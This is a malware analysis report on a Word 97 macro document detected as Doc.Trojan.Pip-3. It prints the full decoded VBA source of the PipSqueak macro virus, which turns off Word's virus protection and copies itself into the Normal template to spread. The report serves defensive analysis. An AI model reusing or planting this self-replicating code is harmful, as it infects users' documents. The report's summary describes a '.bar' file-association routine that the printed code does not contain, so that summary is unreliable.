Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3dbab9b730e9ea96…

MALICIOUS

Office (OLE)

43.0 KB Created: 1998-05-19 12:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2e338c85f99b02d8fcbe7101a46fda80 SHA-1: 7c3f74be3404bb4da4d1a7037b3b31cff114a361 SHA-256: 3dbab9b730e9ea969e83a5c90294bfbfd84476c5e4be2a7a551a92df05bf4ba8
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros, specifically an AutoClose macro. This macro attempts to export itself as 'c:\squeak.dll' and import it into the Normal template, suggesting an attempt to establish persistence or facilitate further execution. The macro also includes code to register a file association for '.bar' files with an application named 'MyApp', which is configured to execute 'notepad.exe %1'. This indicates a likely intent to manipulate file associations for malicious purposes, potentially leading to the execution of further payloads.

Heuristics 5

  • ClamAV: Doc.Trojan.Pip-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pip-3
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 44,032 bytes but its declared streams total only 24,229 bytes — 19,803 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 898 bytes
SHA-256: f83fd321f4d15989d003076411009db4f1de3a5477cb124e3c171d1fc44821bc
Detection
ClamAV: Doc.Trojan.Pip-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "squeak"
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = False
Set norm = NormalTemplate.VBProject.VBComponents: Set doc = ActiveDocument.VBProject.VBComponents
If norm.Item("squeak").Name <> "squeak" Then
  doc("squeak").Export "c:\squeak.dll"
  norm.Import ("c:\squeak.dll")
ElseIf doc.Item("squeak").Name <> "squeak" Then
  norm("squeak").Export "c:\squeak.dll"
  doc.Import ("c:\squeak.dll")
End If
If Day(Now) = 10 Then MsgBox "I would like you to meet WM97.PipSqueak", 0, "PipSqueak"
End Sub
'WM97.PipSqueak.b | Psyclone X | DVC
'Coded for smallest macro virus contest
'Please DO NOT spread

Open this report in the interactive analyzer, or submit your own file for analysis.